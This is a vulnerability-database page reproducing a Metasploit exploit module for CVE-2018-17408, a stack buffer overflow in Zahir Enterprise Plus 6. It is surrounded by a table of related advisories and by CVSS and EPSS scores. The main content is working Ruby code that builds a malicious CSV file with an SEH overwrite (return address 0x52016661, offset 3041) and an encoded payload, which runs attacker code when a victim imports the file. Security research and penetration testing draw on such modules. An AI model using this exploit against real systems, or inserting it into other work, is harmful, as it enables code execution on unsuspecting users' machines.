Vulners
Lucene search
Zahir Enterprise Plus 6 - Stack Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) Exploit | 1 Oct 201800:00 | – | zdt |
 | CVE-2018-17408 | 4 Oct 201816:10 | – | circl |
 | CVE-2018-17408 | 3 Oct 201820:00 | – | cve |
 | CVE-2018-17408 | 3 Oct 201820:00 | – | cvelist |
 | Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) | 1 Oct 201800:00 | – | exploitdb |
 | Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) | 1 Oct 201800:00 | – | exploitpack |
 | Zahir Enterprise Plus 6 Stack Buffer Overflow | 29 Sep 201811:59 | – | metasploit |
 | CVE-2018-17408 | 3 Oct 201820:29 | – | nvd |
 | Zahir Enterprise Plus 6 Build 10b Buffer Overflow | 1 Oct 201800:00 | – | packetstorm |
| Zahir Enterprise Plus 6 Stack Buffer Overflow | 5 Oct 201800:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info={})
super(update_info(info,
'Name' => "Zahir Enterprise Plus 6 Stack Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
via Import from other File. This results in overwriting a structured exception handler record.
},
'License' => MSF_LICENSE,
'Author' =>
[
'f3ci', # initial discovery
'modpr0be' # poc and Metasploit Module
],
'References' =>
[
[ 'CVE', '2018-17408' ],
[ 'EDB', '45505' ]
],
'Platform' => 'win',
'Targets' =>
[
['Zahir Enterprise Plus 6 <= build 10b',
{
#P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
'Ret' => 0x52016661,
'Offset' => 3041
}
]
],
'Payload' =>
{
'Space' => 5000,
'BadChars' => "\x00\x0a\x0d\x22\x2c",
'DisableNops' => true
},
'DisclosureDate' => 'Sep 28 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])
])
end
def exploit
buf = rand_text_alpha_upper(target['Offset'])
buf << "\r\n" # crash chars
buf << rand_text_alpha_upper(380) # extra chars to hit the offset
buf << generate_seh_record(target.ret)
buf << payload.encoded
file_create(buf)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Oct 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
CVSS 37.8
EPSS0.6203